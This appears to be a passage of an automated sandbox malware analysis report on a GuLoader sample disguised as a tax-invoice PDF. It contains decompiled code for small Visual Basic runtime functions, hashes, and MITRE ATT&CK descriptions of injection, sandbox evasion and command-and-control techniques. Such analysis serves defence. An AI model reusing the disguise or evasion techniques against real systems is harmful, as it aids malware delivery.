__vbaHresultCheckObj.MSVBVM60(00000000,?,004117B8,000001D4,?,?,?,?,?,?,?,004014B6), ref: 00416FBB
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,004014B6), ref: 00416FCC

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID:
API String ID: 4127847336-0
Opcode ID: cad9484f9832b657455748e012085a84913e29105d70e96441aec9cc90a699ce
Instruction ID: 2a020738ddc19713ea7513c8609e390ca1c8e452876d96116ee5fffababc3c86
Opcode Fuzzy Hash: cad9484f9832b657455748e012085a84913e29105d70e96441aec9cc90a699ce
Instruction Fuzzy Hash: 5521D8B0A40208EFCB00DF95D849FEEBBB8BB08714F15496AF501B72A0C77D9491DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00413F14, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00413F14(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr* _v28;
				signed int _v32;
				intOrPtr* _v40;
				signed int _v44;
				char* _t26;
				signed int _t29;
				intOrPtr _t40;

				_push(0x4014b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t40;
				_push(0x18);
				L004014B0();
				_v12 = _t40;
				_v8 = E00401160;
				if( *0x41a010 != 0) {
					_v40 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v40 = 0x41a010;
				}
				_t26 =  &_v24;
				L0040169C();
				_v28 = _t26;
				_t29 =  *((intOrPtr*)( *_v28 + 0x1ec))(_v28, _t26,  *((intOrPtr*)( *((intOrPtr*)( *_v40)) + 0x33c))( *_v40));
				asm("fclex");
				_v32 = _t29;
				if(_v32 >= 0) {
					_v44 = _v44 & 0x00000000;
				} else {
					_push(0x1ec);
					_push(0x411730);
					_push(_v28);
					_push(_v32);
					L00401690();
					_v44 = _t29;
				}
				L0040168A();
				_push(0x413fd9);
				return _t29;
			}

0x00413f19
0x00413f24
0x00413f25
0x00413f2c
0x00413f2f
0x00413f37
0x00413f3a
0x00413f48
0x00413f62
0x00413f4a
0x00413f4a
0x00413f4f
0x00413f54
0x00413f59
0x00413f59
0x00413f7d
0x00413f81
0x00413f86
0x00413f91
0x00413f97
0x00413f99
0x00413fa0
0x00413fbc
0x00413fa2
0x00413fa2
0x00413fa7
0x00413fac
0x00413faf
0x00413fb2
0x00413fb7
0x00413fb7
0x00413fc3
0x00413fc8
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00413F2F
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 00413F54
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,004014B6), ref: 00413F81
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411730,000001EC,?,?,?,?,?,?,004014B6), ref: 00413FB2
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,004014B6), ref: 00413FC3

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID:
API String ID: 4127847336-0
Opcode ID: cd6f59a277559687848a30675a4bc7f04ad1e484ac09f634339d864b7dc39b00
Instruction ID: ae1564dd759678129b6924271de2602937cf399e6690e3fbadf74c922e648269
Opcode Fuzzy Hash: cd6f59a277559687848a30675a4bc7f04ad1e484ac09f634339d864b7dc39b00
Instruction Fuzzy Hash: 2D11F170D40208AFCB00DF95C94ABEE7BB8EB08715F20446AF101B72A1C7795A419B69

Uniqueness

Uniqueness Score: -1.00%

Function 00413FEC, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00413FEC(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr* _v28;
				signed int _v32;
				intOrPtr* _v40;
				signed int _v44;
				char* _t26;
				signed int _t29;
				intOrPtr _t40;

				_push(0x4014b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t40;
				_push(0x18);
				L004014B0();
				_v12 = _t40;
				_v8 = 0x401170;
				if( *0x41a010 != 0) {
					_v40 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v40 = 0x41a010;
				}
				_t26 =  &_v24;
				L0040169C();
				_v28 = _t26;
				_t29 =  *((intOrPtr*)( *_v28 + 0x1d0))(_v28, _t26,  *((intOrPtr*)( *((intOrPtr*)( *_v40)) + 0x344))( *_v40));
				asm("fclex");
				_v32 = _t29;
				if(_v32 >= 0) {
					_v44 = _v44 & 0x00000000;
				} else {
					_push(0x1d0);
					_push(0x411740);
					_push(_v28);
					_push(_v32);
					L00401690();
					_v44 = _t29;
				}
				L0040168A();
				_push(0x4140b1);
				return _t29;
			}

0x00413ff1
0x00413ffc
0x00413ffd
0x00414004
0x00414007
0x0041400f
0x00414012
0x00414020
0x0041403a
0x00414022
0x00414022
0x00414027
0x0041402c
0x00414031
0x00414031
0x00414055
0x00414059
0x0041405e
0x00414069
0x0041406f
0x00414071
0x00414078
0x00414094
0x0041407a
0x0041407a
0x0041407f
0x00414084
0x00414087
0x0041408a
0x0041408f
0x0041408f
0x0041409b
0x004140a0
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00414007
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 0041402C
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,004014B6), ref: 00414059
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411740,000001D0,?,?,?,?,?,?,004014B6), ref: 0041408A
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,004014B6), ref: 0041409B

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID:
API String ID: 4127847336-0
Opcode ID: 36cb0c9fef9e56e526acf459a1843dd11f409db2fede60ea342e482bc8dca17c
Instruction ID: dd9820829c22d9c6f7d496751f49c5154c909029d04233d4b47efccbb276ab86
Opcode Fuzzy Hash: 36cb0c9fef9e56e526acf459a1843dd11f409db2fede60ea342e482bc8dca17c
Instruction Fuzzy Hash: 0211FC70900208EFCB00DF95C94ABEEBBF8AB4C755F20446AF201B72A0C77D59809B69

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe PID: 7100 Parent PID: 5944

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exe PID: 7100 Parent PID: 5944 NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.exeCOMMON

Function 00418624, Relevance: 52.8, APIs: 28, Strings: 2, Instructions: 298
COMMON

Function 004016BC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12
COMMON

Function 004114AC, Relevance: .0, Instructions: 8
COMMON

Function 004115A0, Relevance: .0, Instructions: 8
COMMON

Function 0041483A, Relevance: 54.5, APIs: 30, Strings: 1, Instructions: 234
COMMON

Function 004140C4, Relevance: 45.3, APIs: 30, Instructions: 267
COMMON

Function 0041740D, Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 243
COMMON

Function 00417007, Relevance: 40.8, APIs: 27, Instructions: 259
COMMON

Function 00416915, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 213
COMMON

Function 00415258, Relevance: 37.7, APIs: 25, Instructions: 244
COMMON

Function 00414F85, Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 191
COMMON

Function 00416C38, Relevance: 34.7, APIs: 23, Instructions: 205
COMMON

Function 004164DA, Relevance: 34.7, APIs: 23, Instructions: 178
COMMON

Function 004157A1, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 177
COMMON

Function 00415B37, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 159
COMMON

Function 0041626E, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 172
COMMON

Function 00414515, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 138
COMMON

Function 00417795, Relevance: 28.7, APIs: 19, Instructions: 194
COMMON

Function 00417E07, Relevance: 28.7, APIs: 19, Instructions: 167
COMMON

Function 00416782, Relevance: 28.6, APIs: 19, Instructions: 107
COMMON

Function 004155D9, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 121
COMMON

Function 00414BA8, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143
COMMON

Function 00417A32, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 119
COMMON

Function 00418388, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 112
COMMON

Function 00414E1F, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 94
COMMON

Function 00415F06, Relevance: 21.1, APIs: 14, Instructions: 132
COMMON

Function 004181AA, Relevance: 21.1, APIs: 14, Instructions: 132
COMMON

Function 00417BEC, Relevance: 19.7, APIs: 13, Instructions: 153
COMMON

Function 00418071, Relevance: 15.1, APIs: 10, Instructions: 80
COMMON

Function 004160DA, Relevance: 13.6, APIs: 9, Instructions: 103
COMMON

Function 00415A11, Relevance: 12.1, APIs: 8, Instructions: 75
COMMON

Function 0041850A, Relevance: 10.6, APIs: 7, Instructions: 77
COMMON

Function 0041471E, Relevance: 10.6, APIs: 7, Instructions: 69
COMMON

Function 00415DEA, Relevance: 10.6, APIs: 7, Instructions: 69
COMMON

Function 00416F1D, Relevance: 7.6, APIs: 5, Instructions: 60
COMMON

Function 00413F14, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Function 00413FEC, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON